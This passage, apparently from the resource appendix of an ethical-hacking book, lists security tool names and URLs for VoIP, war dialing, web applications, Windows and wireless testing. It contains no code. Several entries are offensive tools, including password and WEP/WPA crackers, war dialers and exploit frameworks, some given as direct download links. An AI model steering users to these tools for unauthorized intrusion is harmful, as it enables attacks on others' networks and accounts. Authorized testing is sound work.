www.amenaza.com

Software Engineering Institute's OCTAVE methodology
www.cert.org/octave

Voice over IP:

Cain and Abel
www.oxid.it/cain.html

NIST's SP800-58 document
http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf

PROTOS
www.ee.oulu.fi/research/ouspg/protos

SearchVoIP.com
http://searchvoip.techtarget.com

SIP Forum Test Framework
www.sipfoundry.org/sftf/index.html

sipsak
http://sipsak.org

SiVuS
www.vopsecurity.org/html/tools.html

vomit
http://vomit.xtdnet.nl

War Dialing:

Sandstorm Enterprises PhoneSweep
www.sandstorm.net/products/phonesweep

Sandstorm Enterprises Sandtrap wardialing honeypot
www.sandstorm.net/products/sandtrap

THC-Scan
http://packetstormsecurity.org/groups/thc/thc-ts201.zip

ToneLoc
www.securityfocus.com/data/tools/auditing/pstn/tl110.zip

Web Applications and Databases:

2600's Hacked Pages
www.2600.com/hacked_pages

Acunetix Web Vulnerability Scanner
www.acunetix.com

AppDetective
www.appsecinc.com/products/appdetective

Brutus
http://securitylab.ru/_tools/brutus-aet2.zip

HTTrack Website Copier
www.httrack.com

Foundstone's Hacme Tools
http://www.foundstone.com/resources/s3i_tools.htm

Google Hacking Database
http://johnny.ihackstuff.com/index.php?module=prodreviews

Netcraft
www.netcraft.com

NGSSquirrel
www.ngssoftware.com/software.htm

N-Stealth Security Scanner
www.nstalker.com/eng/products/nstealth

Paros Proxy
www.parosproxy.org

Pete Finnigan's listing of Oracle scanning tools
www.petefinnigan.com/tools.htm

Port 80 Software's ServerMask
www.port80software.com/products/servermask

Port 80 Software's Custom Error
www.port80software.com/products/customerror

SiteDigger
www.foundstone.com/resources/proddesc/sitedigger.htm

SQLPing2 and SQLRecon
www.sqlsecurity.com/Tools/FreeTools/tabid/65/Default.aspx

WebInspect
www.spidynamics.com/products/webinspect/index.html

WebGoat
www.owasp.org/index.php/Category:OWASP_WebGoat_Project

Windows:

CORE IMPACT
www.coresecurity.com

DumpSec
www.somarsoft.com

Effective File Search
www.sowsoft.com/search.htm

FileLocator Pro
www.mythicsoft.com/filelocatorpro

Legion
http://packetstormsecurity.nl/groups/rhino9/legionv21.zip

Metasploit
www.metasploit.com

Microsoft Baseline Security Analyzer
www.microsoft.com/technet/security/tools/mbsahome.mspx

Microsoft TechNet Security Center
www.microsoft.com/technet/security/Default.asp

Network Users
www.optimumx.com/download/netusers.zip

Rpcdump
www.bindview.com/Services/RAZOR/Utilities/Windows/rpctools1.0-readme.cfm

SMAC MAC address changer
www.klcconsulting.net/smac

Vision
www.foundstone.com/knowledge/proddesc/vision.html

Walksam
www.bindview.com/Services/RAZOR/Utilities/Windows/rpctools1.0-readme.cfm

Winfo
www.ntsecurity.nu/toolbox/winfo

Wireless Networks:

Aircrack
http://freshmeat.net/projects/aircrack

AirMagnet Laptop Analyzer
www.airmagnet.com/products/laptop.htm

AiroPeek SE
www.wildpackets.com/products/airopeek/airopeek_se/overview

AirSnort
http://airsnort.shmoo.com

Cantenna war-driving kit
http://mywebpages.comcast.net/hughpep

CommView for Wi-Fi
www.tamos.com/products/commwifi

Digital Hotspotter
www.canarywireless.com

Homebrew WiFi antenna
www.turnpoint.net/wireless/has.html

KisMAC
http://kismac.binaervarianz.de

Kismet
www.kismetwireless.net

Lucent Orinoco Registry Encryption/Decryption program
www.cqure.net/tools.jsp?id=3

NetStumbler
www.netstumbler.com

OmniPeek
www.wildpackets.com/products/omni/overview/omnipeek_analyzers

RFprotect Mobile
www.networkchemistry.com/products/rfprotectmobile.php

SeattleWireless HardwareComparison page
www.seattlewireless.net/index.cgi/HardwareComparison

Security of the WEP Algorithm
www.isaac.cs.berkeley.edu/isaac/wep-faq.html

The Unofficial 802.11 Security Web Page
www.drizzle.com/~aboba/IEEE

Wellenreiter
www.wellenreiter.net

WiGLE database of wireless networks at
www.wigle.net
www.wifimaps.com
www.wifinder.com

WinAirsnort
http://winairsnort.free.fr/

Wireless Vulnerabilities and Exploits
www.wirelessve.org

WPA Cracker
www.tinypeap.com/html/wpa_cracker.html